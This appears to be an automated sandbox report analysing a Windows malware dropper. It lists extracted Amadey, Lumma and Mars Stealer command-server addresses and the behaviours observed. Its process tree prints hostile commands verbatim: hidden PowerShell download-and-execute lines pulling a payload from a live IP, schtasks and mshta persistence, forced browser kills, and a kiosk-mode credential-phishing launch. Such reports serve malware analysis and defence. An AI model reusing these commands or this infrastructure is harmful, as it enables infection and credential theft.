Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16/03/2025, 18:09

General

  • Target

    d9f00ea479721f7581810bda98dca097.exe

  • Size

    2.1MB

  • MD5

    d9f00ea479721f7581810bda98dca097

  • SHA1

    0b438eab56eb426d68bdeb2bd7c6f69af19daca6

  • SHA256

    53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1

  • SHA512

    af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55

  • SSDEEP

    49152:JEESzuUhMGOiuMWTSby13yX9FIgn3ITa02qmF:JQBbHWTr1493Y+IU

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://selfdefens.bet/api

https://caliberc.today/api

https://3p1pistolpra.bet/api

https://yweaponwo.life/api

https://armamenti.world/api

https://targett.top/api

https://armoryarch.shop/api

https://qnblackeblast.run/api

https://citydisco.bet/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://2weaponrywo.digital/api

https://gunrightsp.run/api

https://pistolpra.bet/api

https://weaponwo.life/api

Extracted

Family

marsstealer

Botnet

Default

C2

ctrlgem.xyz/gate.php

Extracted

Family

lumma

C2

https://codxefusion.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Mars Stealer

    An infostealer written in C++ based on other infostealers.

  • Marsstealer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 28 IoCs
  • Checks BIOS information in registry 2 TTPs 34 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 46 IoCs
  • Identifies Wine through registry keys 2 TTPs 17 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d9f00ea479721f7581810bda98dca097.exe
    "C:\Users\Admin\AppData\Local\Temp\d9f00ea479721f7581810bda98dca097.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe
        "C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:648
      • C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
          "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2184
      • C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\10234920101\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:784
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2292
          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2456
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3060
          • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2228
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              PID:2016
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              PID:2476
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:3056
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 1028
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2904
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 524
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:1680
          • C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
            "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1672
            • C:\Windows\SysWOW64\SCHTASKS.exe
              SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2628
          • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
            "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
            5⤵
            • Executes dropped EXE
            PID:1208
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1208 -s 36
              6⤵
              • Loads dropped DLL
              PID:1428
          • C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
            5⤵
            • Executes dropped EXE
            PID:3008
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 3008 -s 36
              6⤵
              • Loads dropped DLL
              PID:1640
          • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1976
            • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
              "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2276
          • C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe
            "C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"
            5⤵
            • Executes dropped EXE
            PID:2332
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2332 -s 36
              6⤵
              • Loads dropped DLL
              PID:1696
          • C:\Users\Admin\AppData\Local\Temp\10030290101\d1c5d5ba0c.exe
            "C:\Users\Admin\AppData\Local\Temp\10030290101\d1c5d5ba0c.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1552
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:4088
          • C:\Users\Admin\AppData\Local\Temp\10030300101\40aa8dcbf1.exe
            "C:\Users\Admin\AppData\Local\Temp\10030300101\40aa8dcbf1.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            PID:952
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:3424
      • C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe
        "C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2036
      • C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe
        "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        PID:1796
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:392
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 5
            5⤵
            • Delays execution with timeout.exe
            PID:444
      • C:\Users\Admin\AppData\Local\Temp\10235690101\c393ec8900.exe
        "C:\Users\Admin\AppData\Local\Temp\10235690101\c393ec8900.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn 4gjaXma8ygd /tr "mshta C:\Users\Admin\AppData\Local\Temp\qzfTpomuq.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1984
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn 4gjaXma8ygd /tr "mshta C:\Users\Admin\AppData\Local\Temp\qzfTpomuq.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1640
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\qzfTpomuq.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:1964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YAIBJGGQHV43A3BATOSHVCUR3V6WJVMQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2840
            • C:\Users\Admin\AppData\Local\TempYAIBJGGQHV43A3BATOSHVCUR3V6WJVMQ.EXE
              "C:\Users\Admin\AppData\Local\TempYAIBJGGQHV43A3BATOSHVCUR3V6WJVMQ.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:776
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10235700121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1528
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:1292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1524
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2280
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:888
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2524
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "6kleImaYPIQ" /tr "mshta \"C:\Temp\2LYyBGRSD.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2348
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\2LYyBGRSD.hta"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:2136
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:632
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1988
      • C:\Users\Admin\AppData\Local\Temp\10235920101\470bd3f4cb.exe
        "C:\Users\Admin\AppData\Local\Temp\10235920101\470bd3f4cb.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2112
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 1224
          4⤵
          • Program crash
          PID:1700
      • C:\Users\Admin\AppData\Local\Temp\10235930101\47c8b43249.exe
        "C:\Users\Admin\AppData\Local\Temp\10235930101\47c8b43249.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2100
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1204
          4⤵
          • Program crash
          PID:1640
      • C:\Users\Admin\AppData\Local\Temp\10235940101\2413446e48.exe
        "C:\Users\Admin\AppData\Local\Temp\10235940101\2413446e48.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1192
        • C:\Users\Admin\AppData\Local\Temp\7WDR2VHE0WPPDBDI0.exe
          "C:\Users\Admin\AppData\Local\Temp\7WDR2VHE0WPPDBDI0.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:2184
      • C:\Users\Admin\AppData\Local\Temp\10235950101\3dfbfd95c0.exe
        "C:\Users\Admin\AppData\Local\Temp\10235950101\3dfbfd95c0.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1532
      • C:\Users\Admin\AppData\Local\Temp\10235960101\40aa8dcbf1.exe
        "C:\Users\Admin\AppData\Local\Temp\10235960101\40aa8dcbf1.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1216
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1284
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2172
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:704
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1568
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:1888
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2184
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.0.750954283\1223741335" -parentBuildID 20221007134813 -prefsHandle 1196 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {acf50143-7e27-43e6-a089-6c1bf1921e37} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 1288 123d7f58 gpu
                6⤵
                  PID:2432
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.1.325832551\1799160019" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85b2273c-c111-4049-ab60-751a4a84c492} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 1488 d74b58 socket
                  6⤵
                    PID:2544
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.2.1949982586\1644164675" -childID 1 -isForBrowser -prefsHandle 2032 -prefMapHandle 2028 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {125307d8-4958-4a96-945a-5b18965b5d93} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 2044 d65b58 tab
                    6⤵
                      PID:1800
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.3.1271336048\986443818" -childID 2 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb5535d3-9337-4869-902d-7c9858a09ef9} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 2904 d5e158 tab
                      6⤵
                        PID:2268
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.4.1105621742\178482774" -childID 3 -isForBrowser -prefsHandle 3724 -prefMapHandle 3688 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ec81a8b-7421-4351-baa2-65903cc3a2ad} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 3736 1f0b8358 tab
                        6⤵
                          PID:3456
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.5.1488054381\1397355000" -childID 4 -isForBrowser -prefsHandle 3836 -prefMapHandle 3840 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8e16f29-7182-4157-af5c-90358214ed6a} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 3824 1f0b9e58 tab
                          6⤵
                            PID:3464
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.6.1579323552\2140320615" -childID 5 -isForBrowser -prefsHandle 4000 -prefMapHandle 4004 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3e59095-ec43-48c4-9cf1-3fa1705adaac} 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 3988 208e7558 tab
                            6⤵
                              PID:3472
                      • C:\Users\Admin\AppData\Local\Temp\10235970101\8bc5c75870.exe
                        "C:\Users\Admin\AppData\Local\Temp\10235970101\8bc5c75870.exe"
                        3⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
